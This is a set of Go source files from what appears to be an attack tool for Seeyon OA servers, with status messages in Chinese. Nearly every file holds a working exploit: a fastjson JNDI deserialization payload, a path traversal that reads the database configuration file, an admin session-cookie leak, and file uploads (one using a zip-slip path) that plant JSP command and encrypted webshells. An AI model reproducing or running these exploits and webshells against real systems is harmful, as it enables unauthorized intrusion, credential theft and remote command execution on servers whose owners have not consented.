| if err != nil { 60 | return "", err 61 | } 62 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 63 | resp, err := (&http.Client{}).Do(req) 64 | if err != nil { 65 | return "", err 66 | } 67 | defer resp.Body.Close() 68 | respContent, err := ioutil.ReadAll(resp.Body) 69 | if err != nil { 70 | return "", err 71 | } 72 | return string(respContent), nil 73 | } 74 | -------------------------------------------------------------------------------- /vulners/sy03.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "io/ioutil" 6 | "net/http" 7 | ) 8 | 9 | type Sy03 struct { 10 | } 11 | 12 | func (s *Sy03) Scan(targetUrl string) { 13 | vulnerable, err := sy03scancore(targetUrl) 14 | if err != nil { 15 | color.Red("[x]请求异常!") 16 | return 17 | } 18 | if vulnerable { 19 | color.Green("[+]存在webmail.do任意文件下载(CNVD-2020-62422)") 20 | } else { 21 | color.White("[-]不存在webmail.do任意文件下载(CNVD-2020-62422)") 22 | } 23 | } 24 | 25 | func sy03scancore(targetUrl string) (bool, error) { 26 | scancorePayload := "/seeyon/webmail.do?method=doDownloadAtt&filename=datasourceCtp.txt&filePath=../conf/datasourceCtp.properties" 27 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 28 | if err != nil { 29 | return false, err 30 | } 31 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 32 | resp, err := (&http.Client{}).Do(req) 33 | if err != nil { 34 | return false, err 35 | } 36 | defer resp.Body.Close() 37 | 38 | if resp.StatusCode == 200 { 39 | return true, nil 40 | } else { 41 | return false, err 42 | } 43 | } 44 | 45 | func (*Sy03) Exploit(targetUrl string) { 46 | runResult, err := sy03runcore(targetUrl) 47 | if err != nil { 48 | color.Red("[x]漏洞利用异常!") 49 | return 50 | } 51 | if 
runResult != "" { 52 | color.White(runResult) 53 | } else { 54 | color.White("[!]漏洞利用无返回结果") 55 | } 56 | } 57 | 58 | func sy03runcore(targetUrl string) (string, error) { 59 | runcorePayload := "/seeyon/webmail.do?method=doDownloadAtt&filename=datasourceCtp.txt&filePath=../conf/datasourceCtp.properties" 60 | req, err := http.NewRequest("GET", targetUrl+runcorePayload, nil) 61 | if err != nil { 62 | return "", err 63 | } 64 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 65 | resp, err := (&http.Client{}).Do(req) 66 | if err != nil { 67 | return "", err 68 | } 69 | defer resp.Body.Close() 70 | respContent, err := ioutil.ReadAll(resp.Body) 71 | if err != nil { 72 | return "", err 73 | } 74 | return string(respContent), nil 75 | } 76 | -------------------------------------------------------------------------------- /vulners/sy01.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "io/ioutil" 6 | "net/http" 7 | "strings" 8 | ) 9 | 10 | type Sy01 struct { 11 | } 12 | 13 | func (s *Sy01) Scan(targetUrl string) { 14 | vulnerable, err := sy01scancore(targetUrl) 15 | if err != nil { 16 | color.Red("[x]请求异常!") 17 | return 18 | } 19 | if vulnerable { 20 | color.Green("[+]存在seeyon<8.0_fastjson反序列化") 21 | } else { 22 | color.White("[-]不存在seeyon<8.0_fastjson反序列化") 23 | } 24 | } 25 | 26 | func (*Sy01) Exploit(targetUrl string) { 27 | s := strings.Split(targetUrl, "|") 28 | ldapUrl := s[1] 29 | command := s[2] 30 | runResult, err := sy01runcore(targetUrl, ldapUrl, command) 31 | if err != nil { 32 | color.Red("[x]漏洞利用异常!") 33 | return 34 | } 35 | if runResult != "" { 36 | color.White(runResult) 37 | } else { 38 | color.White("[!]漏洞利用无返回结果") 39 | } 40 | } 41 | 42 | func sy01scancore(targetUrl string) (bool, error) { 43 | fastjson_payload := "_json_params={\"name\":\"S\",\"age\":21" 
44 | req, err := http.NewRequest("POST", targetUrl+"/seeyon/main.do?method=changeLocale", strings.NewReader(fastjson_payload)) 45 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 46 | if err != nil { 47 | return false, err 48 | } 49 | req.Header.Set("Content-Type", "application/x-www-form-urlencoded") 50 | resp, err := (&http.Client{}).Do(req) 51 | if err != nil { 52 | return false, err 53 | } 54 | defer resp.Body.Close() 55 | resContent, err := ioutil.ReadAll(resp.Body) 56 | if err != nil { 57 | return false, err 58 | } 59 | if (strings.Contains(string(resContent), "errorHandle")) && (strings.Contains(string(resContent), "syntax")) { 60 | return true, nil 61 | } else { 62 | return false, nil 63 | } 64 | } 65 | 66 | func sy01runcore(targetUrl string, ldapUril string, command string) (string, error) { 67 | runcorePayload := "_json_params={\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"" + ldapUril + "\",\"autoCommit\":true}" 68 | req, err := http.NewRequest("POST", targetUrl+"/seeyon/main.do?method=changeLocale", strings.NewReader(runcorePayload)) 69 | if err != nil { 70 | return "", err 71 | } 72 | req.Header.Set("cmd", command) 73 | req.Header.Set("Content-Type", "application/x-www-form-urlencoded") 74 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 75 | resp, err := (&http.Client{}).Do(req) 76 | if err != nil { 77 | return "", err 78 | } 79 | defer resp.Body.Close() 80 | respContent, _ := ioutil.ReadAll(resp.Body) 81 | if strings.Contains(string(respContent), "parent.errorHandle") { 82 | return "", nil 83 | } else { 84 | return string(respContent), nil 85 | } 86 | } 87 | -------------------------------------------------------------------------------- /vulners/sy06.go: 
-------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "io/ioutil" 6 | "net/http" 7 | "strings" 8 | ) 9 | 10 | type Sy06 struct { 11 | } 12 | 13 | func (s *Sy06) Scan(targetUrl string) { 14 | vulnerable, err := sy06scancore(targetUrl) 15 | if err != nil { 16 | color.Red("[x]请求异常!") 17 | return 18 | } 19 | if vulnerable { 20 | color.Green("[+]存在htmlofficeservlet任意文件上传") 21 | } else { 22 | color.White("[-]不存在htmlofficeservlet任意文件上传") 23 | } 24 | } 25 | 26 | func (*Sy06) Exploit(targetUrl string) { 27 | runResult, err := sy06runcore(targetUrl) 28 | if err != nil { 29 | color.Red("[x]漏洞利用异常!") 30 | return 31 | } 32 | if runResult != "" { 33 | color.White(runResult) 34 | } else { 35 | color.White("[!]漏洞利用失败!") 36 | } 37 | } 38 | 39 | func sy06scancore(targetUrl string) (bool, error) { 40 | scancorePayload := "/seeyon/htmlofficeservlet" 41 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 42 | if err != nil { 43 | return false, err 44 | } 45 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 46 | resp, err := (&http.Client{}).Do(req) 47 | if err != nil { 48 | return false, err 49 | } 50 | defer resp.Body.Close() 51 | respContent, err := ioutil.ReadAll(resp.Body) 52 | if err != nil { 53 | return false, err 54 | } 55 | if resp.StatusCode == 200 && strings.Contains(string(respContent), "htmoffice") { 56 | return true, nil 57 | } else { 58 | return false, nil 59 | } 60 | } 61 | 62 | func sy06runcore(targetUrl string) (string, error) { 63 | runcorePayload := ` 64 | DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV 65 | OPTION=S3WYOSWLBSGr 66 | currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 67 | CREATEDATE=wUghPB3szB3Xwg66 68 | RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6 69 | originalFileId=wV66 70 | originalCreateDate=wUghPB3szB3Xwg66 71 | 
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6 72 | needReadFile=yRWZdAS6 73 | originalCreateDate=wLSGP4oEzLKAz4=iz=66 74 | <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("seeyoner".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("
"+excuteCmd(request.getParameter("cmd")) + "
");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce 75 | ` 76 | req, err := http.NewRequest("POST", targetUrl+"/seeyon/htmlofficeservlet", strings.NewReader(runcorePayload)) 77 | if err != nil { 78 | return "", err 79 | } 80 | resp, err := (&http.Client{}).Do(req) 81 | if err != nil { 82 | return "", err 83 | } 84 | defer resp.Body.Close() 85 | if checkShell(targetUrl) { 86 | return "文件上传成功!" + targetUrl + "/seeyon/test123456.jsp?pass=seeyoner&cmd=whoami", nil 87 | } else { 88 | return "", nil 89 | } 90 | } 91 | func checkShell(targetUrl string) (result bool) { 92 | shellpath := targetUrl + "/seeyon/test123456.jsp" 93 | req, err := http.NewRequest("GET", shellpath, nil) 94 | if err != nil { 95 | color.Red("[x]Webshell访问异常!") 96 | return 97 | } 98 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 99 | resp, _ := (&http.Client{}).Do(req) 100 | defer resp.Body.Close() 101 | if resp.StatusCode == 200 { 102 | return true 103 | } else { 104 | return false 105 | } 106 | } 107 | -------------------------------------------------------------------------------- /vulners/sy04.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "io/ioutil" 6 | "net/http" 7 | "strings" 8 | ) 9 | 10 | type Sy04 struct { 11 | } 12 | 13 | func (s *Sy04) Scan(targetUrl string) { 14 | vulnerable, err := sy04scancore(targetUrl) 15 | if err != nil { 16 | color.Red("[x]请求异常!") 17 | return 18 | } 19 | if vulnerable { 20 | color.Green("[+]存在ajax.do未授权&任意文件上传") 21 | } else { 22 | color.White("[-]不存在ajax.do未授权&任意文件上传") 23 | } 24 | } 25 | 26 | func (*Sy04) Exploit(targetUrl string) { 27 | runResult, err := sy04runcore(targetUrl) 28 | if err != nil { 29 | color.Red("[x]漏洞利用异常!") 30 | return 31 | } 32 | if runResult != "" { 33 | color.White(runResult) 34 | } else { 35 | color.White("[!]漏洞利用无返回结果.") 
36 | } 37 | } 38 | 39 | func sy04scancore(targetUrl string) (bool, error) { 40 | scancorePayload := "/seeyon/thirdpartyController.do.css/..;/ajax.do" 41 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 42 | if err != nil { 43 | return false, err 44 | } 45 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 46 | resp, err := (&http.Client{}).Do(req) 47 | if err != nil { 48 | return false, err 49 | } 50 | defer resp.Body.Close() 51 | 52 | if resp.StatusCode == 404 { 53 | return false, nil 54 | } else { 55 | return true, nil 56 | } 57 | } 58 | 59 | func sy04runcore(targetUrl string) (string, error) { 60 | runcorePayload := "managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%0AuTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%22%C3%8A%C3%98%C3%AE%C3%84%1EZ%5B%11QTP%5E%1B%7B%C2%80%2A%C2%84%C3%82%2A%60%C3%A5%21e%C3%87%C3%BC%C3%B7-%C3%84%C2%9E%C3%AE%C2%89%C3%AD%C2%ADKfee%7E%C2%95%C3%AF%C2%BF%5E%C3%9B%C3%87%C3%A4L%0A%C3%AC%C3%AEi%C3%AA%C2%B7%C3%BF%C3%A0%C3%BA_%C2%B87%C2%89%C3%AA%C2%92Z%C3%92%C3%8E%C3%BD%2Co%C2%BF%C2%8BgUz%C3%B6%C2%B3%0C%25q%C3%BD%C2%A8%C3%A7g%14%07%5C%C3%AA%C3%A6%21%C3%B7%27%C3%97%C3%AAv%7B%17%C3%9Fs%C3%934%C3%ABe%C2%BEO%C2%93%C2%B8%07%12B%18%C2%81%7E%C2%86%C2%82%C3%98%3F%C3%B7R7%C3%B0W.M%C2%8A%C2%BC%C3%97%C3%BA%C3%BE%3B%C3%97%C2%9C%C3%9F%22%C2%B7t%C2%BB%28%C3%A9n%19Zn%C2%9EQ%C3%AE%C2%9F%C2%B9%C3%B4%C2%9D%17%18v%C3%AC_%C2%B8O%C3%94%3A%C3%B5%C3%97%C2%8F-r%C2%8E%C2%BBQ%C2%96V%C2%AD%C2%87%C2%9F%C2%A0%C3%9C%C3%9D%C2%B7%2C%C3%B41%C2%AE%C2%9D%C3%9BJ%C3%A9%15%C2%BC%C2%A4%C3%94%13%C3%86%C2%BC%C2%BC%08sO%12%C2%AF%1BR%C3%8Bx%C3%A4.4%1E%C2%BC%24%C3%A5JHCHf%05%18%18%C3%85%C2%8A%C2%A8%C2%A5%C2%A7%C2%8F%C2%95C%C3%BF%C2%B9%3CH%C3%B3%C3%98%C3%91%C3%A5%00%12%C2%83%02%01%C2%97%5E%C3%84%C2%A3%C2%B5%3E%C2%A4r4%7Crc%C3%B5%C2%B2%21Z%0A%C2%88%11A%09%0B%C2%8E.%5El%13bY%C3%829%C2%90%C3%86%14%C3%96%C3%B8d.%C3%98%C2%BA%C3%98g%C3%AF%C3%99%0A%2
5%C3%99%C3%ADn%05%C2%85%3DX%C2%8A%60%C2%A1%C2%95%C2%9F%C3%8A%18%C2%AEc%C2%AE%0B%05%C3%89%C3%A56%C2%AA%C3%BE%01%C2%83%C3%A7o%C2%8EdD%C2%9E4%C2%A7%C2%B6%C2%A5%C2%A5%C2%9E0%7C%C2%94%255%C2%B3-%C3%B5%2A%C3%8F%0F%C2%81c%C2%85%C2%BCc%C2%8A%27%40%27%2FL%C3%A7%0A%C3%B8%C2%AA%C2%B4M%0D%C2%8387%C2%94Y%C2%A3%C2%B7%C2%97%C3%86%21%C3%83%C2%A0%C2%B2%C2%B4N%C3%BD%C2%81%C3%9A%07%C2%8CW%18%C2%BF%19%C3%B4%2F%C3%90%5Cf%C2%AE%C2%B9%0EvB%15%C2%82%C3%81%3Aph%C2%88%7CK%C3%83%C3%B2%3C%C2%876%C3%82%23%16%1F%0F%C2%ADe%21%2F%1A%C2%BB%15%C3%91%C2%B0Cp%C3%A1%1C%1AlE%C2%92%C2%B3%C3%B5%C2%B4B%2BRa%C2%8F%40%C3%9E%C2%9D%C2%9EFG%C2%8B%7Fb9%C2%AD%C3%B3%7Er%C3%8CZo%19%C2%B2%1C%C2%B0%C3%BC%C3%9D%C3%B3%16%C2%AB%11+%C3%B8%02%C2%A5%0A%C3%83%17q%0F%17%C3%8B%C3%94%23+p%C2%AF%3Cr%C3%B6%C2%BB%C2%BE%C2%B3_%C3%93%C2%8D%C3%A9%60%3B2N%C2%9B%C2%BD%C3%9C%C2%B7%C2%91%3C%02%C2%82q%C2%BD%C3%95%00%C2%89%17hi%C2%A6mV%7DG%0F%10%C3%94%C3%A5%C3%8C%C2%A5%C2%A7%C3%91N%C3%80%17%C2%B7%C2%89q%C3%BC%C3%86%C2%AF%08%C3%84p%C2%86Y%5D%C2%B5%C3%90%23%2AV%C2%A6%C3%8B%C2%89f%C2%AC%C2%91%C2%B2%C3%8F%C2%A3%15%C2%8B%C3%81%C2%B5v%C3%89%1AU%C2%85c%C2%81%C3%A0+%18Q%1D%C2%AB.%18%C3%A2a0%C3%816%0D%C2%92%0F%7F%C3%86%C3%8E%C2%AF%7F%C2%A6%0A%C2%95%C2%91%C2%A2%C3%9F%C3%A4%C3%93%3A_%C2%80%06%C3%A9%C3%AA%0D_%3F%C2%8D%3Cb%0CX%7D%12%28%C2%85%29%C2%A07%C2%BD%C2%A6%3E%C2%B5%C3%9E%C3%8D%C2%AF_k%C2%A3LOL%0E%12%C2%9B%C2%8A%27%C2%8FwX%3E%C3%A6%C2%99%22%C2%89%18%C3%92%C3%89%15%C2%9A%C3%83%C3%823%C3%B1%C2%95%C2%BDMw%C2%86%3AW%23m%C3%86%C3%B2Z%C3%9E%C3%AD%C2%8A%5B%7F%08%1A%C3%9E%C3%85%06qX%C2%AF%2A%C2%8B%25%06%C2%96%C2%81%C3%81%60W8%C2%82%C3%81%1F%C2%88%C3%B1%C3%B6G%01j%C2%9E%C2%8D%C2%B3G%0E%09%C3%B33e1%C2%B0%C3%B8%C3%A1%C3%92%C2%8BU%C3%9E6%C3%85%C2%88%C3%85%C3%87%C3%BC0%2Ah%C3%8E3%40%C3%83%5BO%C3%AF%C2%84q%01%25c%08Ym%C2%B7%C3%93%C3%B1%C2%AD%27%C2%81%C2%A0R%C3%97%C2%9A%C3%B0%C2%9Ed%C3%B0%C3%9B%C3%A8R6u%5D%C2%96%C3%9E%60%C3%B7%C3%B8%3E%C3%A3%5CV%C3%84%5D%C2%822%C3%90%C2%9D%3C%C3%AB%C2%B3o%C3%83%17%1F%24%C2%90%C2%8D9%C2%BC%C3%93f%C3%82%3FW%C3%AA%C3%BCw%C2%AA%1B
%C2%B3%C3%BB%C2%A5%C2%B1m.%C2%9D%3B%60%C2%B7%C2%A1%C2%93%C3%A2xd%00%C2%B7%25%C3%B0%C3%B0%C2%A5u%C3%98%C3%8F%C2%BF%3E%7D%5C%12%1F%C2%B7L%C3%B7v%C3%81q%C3%A7%23%C3%B8%C3%BF%C3%A9%02%C2%9Cd%3Es%C3%AC%C3%87%C3%B7zA2%06%C3%BAG.%C3%8B%C3%9D%1C%01%C2%AE%C2%AA%C2%AA%C3%8E%C3%83k%C3%BB%07%C3%9B%C2%9Als%C2%BE%C3%964%3F%17%7E%C3%BB%C3%AF%7F%01-%C2%A9%C2%AB%26p%05%00%00" 61 | req, err := http.NewRequest("POST", targetUrl+"/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip", strings.NewReader(runcorePayload)) 62 | if err != nil { 63 | return "", err 64 | } 65 | req.Header.Set("Content-Type", "application/x-www-form-urlencoded") 66 | resp, err := (&http.Client{}).Do(req) 67 | if err != nil { 68 | return "", err 69 | } 70 | defer resp.Body.Close() 71 | resContent, err := ioutil.ReadAll(resp.Body) 72 | if err != nil { 73 | return "", err 74 | } 75 | if strings.Contains(string(resContent), "\"message\":null") { 76 | return targetUrl + "/seeyon/common/designer/pageLayout/mrn.jsp,密码rebeyond", nil 77 | } else { 78 | return "", nil 79 | } 80 | } 81 | -------------------------------------------------------------------------------- /vulners/sy02.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "archive/zip" 5 | "bytes" 6 | "fmt" 7 | "github.com/fatih/color" 8 | "io/ioutil" 9 | "math/rand" 10 | "mime/multipart" 11 | "net/http" 12 | "os" 13 | "regexp" 14 | "strings" 15 | "time" 16 | ) 17 | 18 | var ( 19 | WebshellName string 20 | ) 21 | 22 | type Sy02 struct { 23 | } 24 | 25 | func (s *Sy02) Scan(targetUrl string) { 26 | vulnerable, err := sy02scancore(targetUrl) 27 | if err != nil { 28 | color.Red("[x]请求异常!") 29 | return 30 | } 31 | if vulnerable { 32 | color.Green("[+]存在thirdpartyController.do管理员session泄露") 33 | } else { 34 | color.White("[-]不存在thirdpartyController.do管理员session泄露") 35 | } 36 | } 37 | 38 | func sy02scancore(targetUrl string) (bool, error) { 39 
| sessionLeakPayload := "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1" 40 | req, err := http.NewRequest("POST", targetUrl+"/seeyon/thirdpartyController.do", strings.NewReader(sessionLeakPayload)) 41 | req.Header.Set("Content-Type", "application/x-www-form-urlencoded") 42 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 43 | resp, err := (&http.Client{}).Do(req) 44 | if err != nil { 45 | return false, err 46 | } 47 | defer resp.Body.Close() 48 | resContent, err := ioutil.ReadAll(resp.Body) 49 | if err != nil { 50 | return false, err 51 | } 52 | if resp.Header.Get("Set-Cookie") != "" && (strings.Contains(string(resContent), "a8genius.do")) { 53 | return true, nil 54 | } else { 55 | return false, nil 56 | } 57 | } 58 | 59 | func getCookie(targetUrl string) (cookiestr string) { 60 | adminCookie := "" 61 | sessionLeakPayload := "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1" 62 | req, err := http.NewRequest("POST", targetUrl+"/seeyon/thirdpartyController.do", strings.NewReader(sessionLeakPayload)) 63 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 64 | if err != nil { 65 | color.Red("[x]探测失败!(req)") 66 | } 67 | req.Header.Set("Content-Type", "application/x-www-form-urlencoded") 68 | resp, err := (&http.Client{}).Do(req) 69 | if err != nil { 70 | color.Red("[x]探测失败!(req)") 71 | } 72 | defer resp.Body.Close() 73 | resContent, err := ioutil.ReadAll(resp.Body) 74 | if err != nil { 75 | color.Red("[x]探测失败!(resp)") 76 | } 77 | isExist := (resp.Header.Get("Set-Cookie") != "") && (strings.Contains(string(resContent), "a8genius.do")) 78 | if isExist { 79 | adminCookie = resp.Header.Get("Set-Cookie")[:44] 
80 | color.Green("[+]Cookie获取成功:" + adminCookie) 81 | } else { 82 | color.White("[-]获取Cookie失败!") 83 | adminCookie = "" 84 | } 85 | return adminCookie 86 | } 87 | 88 | func createZip() (string, error) { 89 | shellData := "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter(\"seeyoner\")!=null){String k=(\"\"+UUID.randomUUID()).replace(\"-\",\"\").substring(16);session.putValue(\"u\",k);out.print(k);return;}Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec((session.getValue(\"u\")+\"\").getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>" 90 | WebshellName = RandStringRunes(10) + ".jsp" 91 | buf := new(bytes.Buffer) 92 | w := zip.NewWriter(buf) 93 | var files = []struct { 94 | Name, Body string 95 | }{ 96 | {"layout.xml", ""}, 97 | {"../" + WebshellName, shellData}, 98 | } 99 | for _, file := range files { 100 | f, err := w.Create(file.Name) 101 | if err != nil { 102 | return "", err 103 | } 104 | _, err = f.Write([]byte(file.Body)) 105 | if err != nil { 106 | return "", err 107 | } 108 | } 109 | // 关闭压缩文档 110 | err := w.Close() 111 | if err != nil { 112 | return "", err 113 | } 114 | // 将压缩文档内容写入文件 115 | zipFileName := RandStringRunes(5) + ".zip" 116 | f, err := os.OpenFile(zipFileName, os.O_CREATE|os.O_WRONLY, 0666) 117 | if err != nil { 118 | return "", err 119 | } 120 | buf.WriteTo(f) 121 | return zipFileName, nil 122 | } 123 | 124 | func uploadZipFile(uri string, params map[string]string, paramName, path string, cookie string) (*http.Request, error) { 125 | file, err := os.Open(path) 126 | if err != nil { 127 | return nil, err 128 | } 129 | fileContents, err := ioutil.ReadAll(file) 130 | if err != nil { 131 | return nil, err 132 | } 133 | fi, err := 
file.Stat() 134 | if err != nil { 135 | return nil, err 136 | } 137 | file.Close() 138 | 139 | body := new(bytes.Buffer) 140 | writer := multipart.NewWriter(body) 141 | part, err := writer.CreateFormFile(paramName, fi.Name()) 142 | if err != nil { 143 | return nil, err 144 | } 145 | part.Write(fileContents) 146 | 147 | for key, val := range params { 148 | _ = writer.WriteField(key, val) 149 | } 150 | err = writer.Close() 151 | if err != nil { 152 | return nil, err 153 | } 154 | request, err := http.NewRequest("POST", uri, body) 155 | request.Header.Add("Content-Type", writer.FormDataContentType()) 156 | request.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 157 | request.Header.Add("Cookie", cookie) 158 | return request, err 159 | } 160 | 161 | func unzipShell(targetUrl string, adminCookie string, respContent string) { 162 | oYear := time.Now().Year() 163 | oMonth := time.Now().Format("01") 164 | oDay := time.Now().Format("02") 165 | dateArgs := fmt.Sprintf("%d-%s-%s", oYear, oMonth, oDay) 166 | re := regexp.MustCompile(`(?i)fileurls=fileurls\+","\+\'(.+)\'`) 167 | shellfileid := re.FindStringSubmatch(respContent)[1] 168 | color.White("[!]上传文件id:" + re.FindStringSubmatch(respContent)[1]) 169 | unzipshellPayload := "method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=[0,\"" + dateArgs + "\",\"" + shellfileid + "\"]" 170 | req, err := http.NewRequest("POST", targetUrl+"/seeyon/ajax.do", strings.NewReader(unzipshellPayload)) 171 | if nil != err { 172 | color.Red("[x]ajax.do接口请求失败!") 173 | return 174 | } 175 | req.Header.Set("Content-Type", "application/x-www-form-urlencoded") 176 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 177 | req.Header.Set("Cookie", adminCookie) 178 | resp, err := (&http.Client{}).Do(req) 179 | if 
err != nil { 180 | color.Red("[x]ajax.do接口请求失败!") 181 | return 182 | } 183 | defer resp.Body.Close() 184 | if err != nil { 185 | color.Red("[x]ajax.do接口返回异常!") 186 | return 187 | } 188 | if resp.StatusCode == 500 { 189 | color.Green("[+]zip文件解压成功!") 190 | color.White("[*]Webshell连接地址:" + targetUrl + "/seeyon/common/designer/pageLayout/" + WebshellName) 191 | color.White("[*]探测Webshell存活状态...") 192 | r, err := http.Get(targetUrl + "/seeyon/common/designer/pageLayout/" + WebshellName) 193 | if err != nil { 194 | color.Red("[x]Webshell访问异常!") 195 | return 196 | } 197 | defer r.Body.Close() 198 | if r.StatusCode == 200 { 199 | color.Green("[+]Webshell连接成功!") 200 | } else { 201 | color.Red("[x]Webshell连接失败!") 202 | } 203 | } 204 | } 205 | 206 | func (*Sy02) Exploit(targetUrl string) { 207 | adminCookie := getCookie(targetUrl) 208 | zipFileName, err := createZip() 209 | if err != nil { 210 | color.Red("[x]zip文件创建失败!") 211 | return 212 | } 213 | zipFilePath := "./" + zipFileName 214 | color.Green("[+]zip文件创建成功,路径:" + zipFilePath) 215 | vulnPath := targetUrl + "/seeyon/fileUpload.do?method=processUpload" 216 | extraParams := map[string]string{ 217 | "firstSave": "true", 218 | "callMethod": "resizeLayout", 219 | "isEncrypt": "0", 220 | "takeOver": "false", 221 | "type": "0", 222 | } 223 | request, err := uploadZipFile(vulnPath, extraParams, "file", zipFilePath, adminCookie) 224 | if err != nil { 225 | color.Red("[x]上传zip文件失败!") 226 | return 227 | } 228 | //fmt.Println(request.Body) 229 | client := &http.Client{} 230 | resp, err := client.Do(request) 231 | if err != nil { 232 | color.Red("[x]上传zip文件失败!") 233 | return 234 | } 235 | defer resp.Body.Close() 236 | respContent, err := ioutil.ReadAll(resp.Body) 237 | if err != nil { 238 | color.Red("[x]读取返回时异常!") 239 | return 240 | } 241 | if strings.Contains(string(respContent), "fileurls") { 242 | color.Green("[+]zip文件上传成功!") 243 | unzipShell(targetUrl, adminCookie, string(respContent)) 244 | } 245 | } 246 | 247 | func 
/* RandStringRunes returns a string of n ASCII letters drawn from math/rand, which is not a cryptographically secure generator; reseeding from the wall clock on every call (rand.Seed is deprecated since Go 1.20) makes the output predictable from the call time. A negative n makes the make call panic. Elsewhere in this file the result is used to name the generated zip and jsp files. */ RandStringRunes(n int) string { 248 | rand.Seed(time.Now().UnixNano()) 249 | /* letters only, so the result is always a plain path component */ var letterRunes = []rune("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ") 250 | b := make([]rune, n) 251 | for i := range b { 252 | b[i] = letterRunes[rand.Intn(len(letterRunes))] 253 | } 254 | return string(b) 255 | } 256 | --------------------------------------------------------------------------------